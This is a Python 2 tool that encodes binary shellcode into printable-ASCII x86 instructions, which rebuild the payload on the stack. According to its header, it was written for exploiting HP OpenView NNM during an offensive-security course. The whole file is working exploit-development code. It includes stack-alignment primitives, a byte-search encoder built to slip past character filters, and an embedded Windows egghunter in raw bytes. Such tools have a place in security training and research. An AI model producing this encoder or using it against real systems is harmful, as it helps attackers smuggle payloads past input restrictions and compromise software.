#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler` 
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output it's ASCII encoded form.
#
# This payload will at the beginning align the stack by firstly moving 
# ESP value to the EAX, then by adding to the EAX value 0x16CA then by
# setting ESP with such resulted EAX. It means that the final decoded shellcode
# will get stored in the stack, by 0x16CA bytes away from current stack address.
#
# Obviously, this encoder will not be working under DEP/W^X environments.
#
# Written for HP OpenView NNM exploitation purpose, during 
# Offensive-Security CTP / OSCE course.
#
# Source:
#   https://gist.github.com/mgeeky/8a118c69312b35a9db7f19f61c7a6b3c
#
# Mariusz B. / mgeeky, '17
#

import random
import struct
import ctypes
import sys

# ================================================
#    OPTIONS
# ================================================

# Characters that are safe to use in encoded payload.
VALID_CHARS = "01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-*\\%"

# Be more verbose.
DEBUG = False

# Set it to True in order to always prepend ZERO-EAX primitive before
# sequence of SUB operations. The `gen` routine will then operate on 
# previous value being always 0x00000000 instead of previously held in 
# EAX value. The side effect of this setting is increased payload length.
PREPEND_ZERO_OUT = False

# ================================================

MAX_NUM = 128

primitives = {
    # Zeros-out the EAX register
    # 25 4a4f4e45   AND EAX,454e4f4a
    # 25 3530313a   AND EAX,3a313035
    #'zero-eax' : '%JONE%501:',

    # Zeros-out the EAX register
    # 25 4A4D4E55 AND EAX,554E4D4A
    # 25 3532312A AND EAX,2A313235
    'zero-eax': '%JMNU%521*',

    # Aligns a stack address that the EAX will take, by 
    # adding value of 0x1688 to the EAX register
    # 2D 41373737   SUB EAX, 37373741
    # 2D 69252525   SUB EAX, 25252569
    # 2D 72324949   SUB EAX, 49493272
    # 2D 5C5A5A5A   SUB EAX, 5A5A5A5C
    'eax-stack-align' : '-A777-i%%%-r2II-\\ZZZ',

    # Sets ESP (stack pointer) to EAX
    # 50            PUSH EAX
    # 5c            POP ESP
    'set-esp-to-eax' : 'P\\',

    # Sets EAX to ESP
    # 54            PUSH ESP
    # 58            POP EAX
    'set-eax-to-esp' : 'TX',

    # ASCII friendly NOP equivalent
    # 47            INC EDI
    'nop' : 'G',

    # Stores resulted EAX value on the stack
    # 50            PUSH EAX
    'store-on-stack' : 'P',
}

class InvalidCharResulted(Exception):
    pass

def dbg(x, raw = False):
    if DEBUG:
        if raw:
            print x
        else:
            print '[dbg] ' + x

def compose(num):
    ret = 0
    ret |= num[3] << 24
    ret |= num[2] << 16
    ret |= num[1] <<  8
    ret |= num[0]
    return ret

def decompose(num):
    decompose = [0, 0, 0, 0]
    decompose[0] = (num & 0x000000ff)
    decompose[1] = (num & 0x0000ff00) >> 8
    decompose[2] = (num & 0x00ff0000) >> 16
    decompose[3] = (num & 0xff000000) >> 24
    return decompose

def strfry(item):
    return ''.join([str(w) for w in random.sample(item, len(item))])

def strfrylist(item):
    x = list(item)
    random.shuffle(x)
    return x

# Original algorithm designed by Jon Erickson, <matrix@phiral.com>
# Heavily modified by the author of this program.
def gen(dword, prev, alphabet):
    chrs_len = len(alphabet)

    t = decompose(dword)
    l = decompose(prev)

    p = [0 for i in range(MAX_NUM)]
    q = [0 for i in range(MAX_NUM)]
    r = [0 for i in range(MAX_NUM)]
    s = [0 for i in range(MAX_NUM)]

    # Initializing index tables
    for a in range(chrs_len):
        p[a] = q[a] = r[a] = s[a] = a + 1 

    # Shuffling index tables
    p = strfrylist(p)
    q = strfrylist(q)
    r = strfrylist(r)
    s = strfrylist(s)

    #pr = strfrylist(list(alphabet[:20]))
    pr = [chr(0) for c in range(20)]

    # Coefficients = subsequent bytes forming a DWORDs that will be
    # used as arguments in SUB operations. coeffs[0] stands for the 
    # first SUB's argument, coeffs[1] for the second SUB's argument and so on.
    coeffs = [
        [0, 0, 0, 0],
        [0, 0, 0, 0],
        [0, 0, 0, 0],
        [0, 0, 0, 0]
    ]

    # 0x2D - SUB opcode. Here we construct a template:
    #   [ ..., 0x2d, AA, BB, CC, DD, ...] where AA,BB,CC,DD will be argument
    # bytes to fill in.
    pr[0] = pr[5] = pr[10] = pr[15] = chr(0x2D)

    # Construct from 1 to 5 at max consecutive SUB operations
    for a in range(1, 5):
        carry = 0
        flag = [0, 0, 0, 0]

        # Iterate over bytes 0...3 composing full 32-bit DWORD
        for z in range(4):
            loop_next = 0

            # Iterate over possible indexes of the first byte within argument
            for i in range(chrs_len):

                # Iterate over possible indexes of the second byte within argument
                for j in range(chrs_len):
                    for k in range(chrs_len):
                        for m in range(chrs_len):

                            # We get random byte from valid chars charset at currently 
                            # processed positions.
                            x1 = alphabet[p[i] - 1]
                            x2 = alphabet[q[j] - 1]
                            x3 = alphabet[r[k] - 1]
                            x4 = alphabet[s[m] - 1]

                            # t[z] - Desired[z], the target byte we are looking for
                            # l[z] - Previous[z], the previous byte on this position.
                            # Desired[z] = Previous[z] - Carry - A[z] - B[z] - C[z] - D[z]
                            # Previous[z] = Desired[z] + Carry + A[z] + B[z] + C[z] + D[z]
                            tr = ctypes.c_uint32( t[z] + carry \
                                        + ord(x1) + ord(x2) \
                                        + ord(x3) + ord(x4)).value

                            # If sum result equals to our previous byte at this position -
                            # we have a hit.
                            if (tr & 0xff) == l[z]:

                                # Resulted value, in `tr` might be easily something like: 0x175
                                # then the carry will be 0x01
                                carry = (tr & 0xff00) >> 8

                                # We hit bytes forming a good looking DWORD (32 bit value), therefore
                                # we store that value for later considerations
                                if i < chrs_len: 
                                    pr[ 1 + z] = x1
                                    coeffs[0][z] = ord(x1)
                                if j < chrs_len:
                                    pr[ 6 + z] = x2
                                    coeffs[1][z] = ord(x2)
                                if k < chrs_len: 
                                    pr[11 + z] = x3
                                    coeffs[2][z] = ord(x3)
                                if m < chrs_len: 
                                    pr[16 + z] = x4
                                    coeffs[3][z] = ord(x4)

                                dbg('try = %x, l[%d] = %x, t[%d] = %x, coeffs = %s' % \
                                    (tr, z, l[z], z, t[z], str(coeffs)))

                                loop_next = 1

                                # We mark that we have already found a good values for that `z` position.
                                flag[z] = 1

                            if a < 4 or loop_next: break
                        if a < 3 or loop_next: break
                    if a < 2 or loop_next: break

        # Have we found already all 4 byte candidates?
        if sum(flag) == 4:
            dbg('flag=%s, a=%d, z=%d, i=%d, j=%d, k=%d, m=%d' % (flag,a,z,i,j,k,m))
            break

    assert sum(flag) == 4, "Could not generate computation instructions for this dword: 0x%08x" % dword

    dbg('Coeffs before fixups = %s' % (str(coeffs)))

    # Now we need to check whether the above algorithm did not fell into local optimum
    # and didn't yielded some slightly varying values. We will retry 5 times values fixups.
    ctr = 0
    while ctr < 5:
        ctr += 1
        dbg('Fixup attempt %d: gen(0x%08x, 0x%08x, ...): "%s"' % \
            (ctr, dword, prev, ''.join(['%02x' % ord(c) for c in pr])))

        # Now we print assembler interpretation of collected coefficients
        val = prev
        dbg('\n\t\t\t\t; EAX = 0x%08x' % val, True)
        for n in coeffs:
            num = compose(n)
            val = ctypes.c_uint32(val - num).value
            dbg('\tSUB EAX, 0x%08x\t; EAX = 0x%08x' % (num, val), True)

        # oops, the resutled from substraction value is not matching desired one.
        # we will have to fixup bytes that differ and retry verification process.
        if val != dword:
            dbg('in attempt #%d values do not match: 0x%08x != 0x%08x' % (ctr,val,dword))

            valdec = decompose(ctypes.c_uint32(val).value )
            dworddec = decompose(ctypes.c_uint32(dword).value)

            # We check each of the four bytes whether they differ from desired.
            for i in range(4):
                if valdec[i] != dworddec[i]:
                    dbg('byte %d needs fixing %02x => %02x' % (i, valdec[i], dworddec[i]))
                    
                    # Since they differ, we fixup them
                    diff = valdec[i] - dworddec[i]
                    pr[16 + i] = chr(ord(pr[16 + i]) + diff)
                    coeffs[3][i] += diff

                    # Resulted byte after applied fixup outlies our VALID_CHARS charset,
                    # we could have re-invoke the gen() routine here, but it will be easier
                    # to just quit and try again from the scratch.
                    if pr[16 + i] not in VALID_CHARS:
                        raise InvalidCharResulted(pr[16+i])

        else:
            dbg('Values match perfectly: 0x%08x == 0x%08x' % (val, dword))
            break

    if val != dword:
        print '\n[!] COMPUTATION FAILURE: 0x%08x != 0x%08x' % (val, dword)
        sys.exit(-1)

    ret = ''.join(pr)
    return ret

def process(inp, prepend_init = True):
    size = len(inp)
    pad = 4 - (size % 4)
    if pad == 4: pad = 0
    alphabet = strfry(VALID_CHARS)

    # Build up initial payload's stub
    out = ''

    if prepend_init:
        out += primitives['zero-eax']
        out += primitives['set-eax-to-esp']
        out += primitives['eax-stack-align']
        out += primitives['set-esp-to-eax']

        if not PREPEND_ZERO_OUT:
            out += primitives['zero-eax']

    buf = inp + '\x90' * pad
    assert len(buf) % 4 == 0, "Working buffer must be divisble by 4!"

    prev = 0

    # Iterate over every next four bytes grouped values (DWORDs)
    for i in range(len(buf), 0, -4):
        dword = struct.unpack('<I', buf[i-4:i])[0]
        alphabet = strfry(alphabet)
        instr = gen(dword, prev, alphabet)
        if PREPEND_ZERO_OUT:
            prev = 0
            out += primitives['zero-eax']
        else:
            prev = dword
        out += instr + primitives['store-on-stack']

    
    return out

def usage():
    print '''
    :: printable-shellcode.py - Utility generating a ASCII-printable shellcode
                                out of provided binary file (ASCII encoder).
        Mariusz B. / mgeeky, '17

        Algorithm based on terrific `dissembler` tool by Phiral Research Labs,
        by Jon Erickson <matrix@phiral.com>

Usage:
    printable-shellcode.py <input-file|0xValue> <output-file>

Where:
    input-file      - input file containing shellcode, '-' for stdin or 'EGG' for 
                        standard T00WT00W 32-bit windows egghunter
    0xValue         - single DWORD value, prepended with 0x to encode.
    output-file     - file to store result of ASCII encoding, or '-' for stdout
'''

def display_output(out):
    print '[+] SHELLCODE ENCODED PROPERLY. Resulted length: %d bytes' % (len(out))
    print
    print '-' * 80
    print out
    print '-' * 80
    print
    print '[+] HEX FORM:' 
    print ''.join(['%02x' % ord(c) for c in out])
    print
    print '[+] ESCAPED-HEX FORM:' 
    print ''.join(['\\x%02x' % ord(c) for c in out])
    print 
    print '[+] PYTHON COMPACT SEXY FORM:'
    buf = '\tshellcode += r"'
    for i in range(len(out)):
        if i % 20 == 0 and i > 0:
            buf += '"\n\tshellcode += r"'
        buf += out[i]
    buf += '"'
    print buf

def primitives_precheck():
    failed = False
    for k, v in primitives.items():
        for c in v:
            if c not in VALID_CHARS:
                print '[!] ERROR: Primitive "%s" contains illegal character in it: (0x%02x, "%c")' % (k, ord(c), c)
                print '[!] It means you will have to find a suitable primitive yourself and modify the `primitives` dictionary within this script.'
                print
                failed = True

    return not failed

def main():
    if len(sys.argv) != 3:
        if len(sys.argv) == 2 and sys.argv[1].startswith('0x'):
            pass
        else:
            usage()
            return False

    if not primitives_precheck():
        return False

    input_bytes = []
    prepend_init = True

    if sys.argv[1] == '-':
        input_bytes = sys.stdin.read()
    elif sys.argv[1].startswith('0x'):
        input_bytes = ''.join([chr(c) for c in decompose(int(sys.argv[1], 16))])
        prepend_init = False
    elif sys.argv[1] == 'EGG':
        input_bytes = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
    else:
        with open(sys.argv[1], 'rb') as f:
            input_bytes = f.read()

    print '[*] Input buffer size: %d bytes.' % (len(input_bytes))

    i = 0
    success = False
    while i < 3:
        try:
            out = process(input_bytes, prepend_init)
            if out:
                success = True
                display_output(out)
                if len(sys.argv) > 2 and sys.argv[2] != '-':
                    with open(sys.argv[2], 'wb') as f:
                        f.write(out)
            else:
                print '[?] Returned empty payload. Confused...'

            break
        except InvalidCharResulted as pr:
            print '[!] Inter-bytes difference resulted too big rendering invalid char (%x, "%c"). Restarting...' % (ord(str(pr)), str(pr))
            continue

    if not success:
        print '[!] PROGRAM FAILURE.'

if __name__ == '__main__':
    main()